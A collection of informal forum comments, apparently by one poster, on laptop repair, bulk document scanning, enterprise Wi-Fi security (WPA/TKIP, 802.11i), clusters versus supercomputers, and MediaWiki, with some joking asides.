With the notebook upside down, as you take a screw out, place on the BACK piece of paper in the same relative position it came from on the bottom of the notebook. If you have to flip it and pull screws from the top side, use the other sheet of paper.
Once you're ready to re-assemble, reverse.....
Simple, worls like a charm.....
I number of years ago, the LARGE (read beltway bandit) contracting firm I was working for landed a private contract with a major insurance firm. Said firm had been NAILed in a class action lawsuit, and as part of the resultant consent decree, had to digitize ALL of it's paper policies and contracts, going back years. This averaged over 90 front-and-back pages per customer, and there were millions of customers. They had (originally) about 90 days to get it done.
This insurance company custom built several scan assembly lines, which used automated (Xerox IIRC) scanners and document handlers, as well as lots of custom software (that we customized).
This was more than seven years ago, so I would be suprised if the core technology isn't available at Kinkos or maybe even somewhere within your own university. Ask around, and if it's not there, call the local Xerox rep and ask to have one of the devices out on a demo. Whether the uni buys one or not, you can probably get YOUR work done, and make YOUR prof happy.
There is no way that 802.11i is going to change anything about CCMP.
I agree, it's unlikely, but possible. Sponsor ballot (and I'm a voter there, too) is NOT the final stage, so a change might come, but again, it is unlikely.
I'm much more concerned about interoperability issues. One thing that I have learned is that if something isn't 3d party tested, it will not interoperate. In the course of operating a commercial interoperability testing and certification program for IPSec products, we have to date, after 6 years of testing, NEVER seen a product submitted which did not require corrections in order to interoperate. This is not a comment on coding quality, FWIW. Interoperability is HARD, and far from automatic, even if there is a good standard to follow.
Now, will I see you in the group of grumpy folks in Anaheim?
You can also bet these are not consumer-grade access points like the original poster seemed to be leaning towards, but higher end units. Consumer-grade stuff is priced at around $100 US, while the enterprise class APs intended for this kind of deployment cost hundreds.
As far as the actual data entry, it doesn't have to be a knuckle drill.... why do you think they bar code the MAC onto the NIC?
I would recommend that you implement (now) WPA with TKIP encryption. If you're a MS shop, and have an Active Directory infrastructure, adding MS IAS (internet authentication server) to that is very easy, and you're probably already licensed. Then you get to choose between authentication methods, and MS supports (and integrates into XP) EAP-MS-CHAP and EAP-TLS, basically login/passwd and digital certs, respectively. I would avoid Preshared Secret Keys (PSKs) due to their vulnerability to off-line dictionary attacks, unless you're willing to generate the PSKs in a cryptographically sound manner and push the length out quite a bit.
Likewise, I would counsel caution about using the AES encryption. If you purchase all of your gear from one vendor, you'll probably be OK, but there are a couple of gotcha's that you need to know about. First, the IEEE 802.11i standard which specifies CCMP (the AES crypto) is not yet final. It's extremely unlikely, but it _could_ change (we meet next week). Any vendor you choose today would likely provide updates in the event of a change, but who knows. More importantly, because the 11i is not final, the Wi-Fi Alliance has not yet integrated CCMP into their testing. So not only do you have absolutely no guarantee of interoperability, no one other than the vendor has tested the crypto implementation. Most crypto folks have a good feeling about AES, but no sane cryptographer trusts an implementation that hasn't been 3d party tested.
Unfortunately, if you need to support Linux, you're in for a hard time. I am not aware of a complete working set of client-side "stuff" to integrate into this lashup, although I did notice the beginnings of some support in the recent 2.6.5 kernel. Do NOT assume that you will be able to get linux working in this environment right now. It's comming..... but it's ain't there yet.
Now, on the subject of some of the other "advice" offered here....
There is a book out from Microsoft Press that gives a lot of background, and takes you step-by-step through getting all of this crap up and running in their environment. I have met the author, and know a number of the contributors from the committee. I highly recommend it, available here. I sincerely hope all of this helps....
His rhetoric is quite predictable, actually. He talks at some length about how and why clusters of PCs can't get the job done, and how clustering is inherently inferior to a REAL SuperComputer, then goes on to describe how their new product (which sounds suprisingly like a cluster of propreitary machines) can work. Repeat the above as it applies to the management software.
If clustering doesn't work, and Supers are better / cheaper, explain why large companies (Pixar, NVidia,
Note that this does NOT mean that clusters are suitable for ALL traditional SuperComputing tasks. It really depends on the problem. If the problem is better solved with a vector processor, then a vector machine (like a Cray) is what you want. If the problem is solvable in parallel, then a cluster might be the right answer.
A wiki brings a lot to the table to facilitate documentation, and excels at cooperative documentation. We're using MediaWiki software internally with some success. Installation is not difficult (requires MySQL, PHP and Apache) and is well documented. Any web browser is used to view and / or edit documents, and the resultant HTML may be saved and viewed off-line.
Ah.... I've met RMS a number of times, and having once made the mistake of standing downwind, am familiar with this problem. Try Soap and Water, augmented with a long-handled stiff brush. Pardon the Pun, but Lather, Rinse, Repeat. Works wonders for your complexion, with immediate secondary positive effects on the `ol social life...
I know Crispin Cowan personally, and I have never heard of this project! Maybe some of the DARPA funding should have gone to advertising, publicity, or (God forbid) Marketing?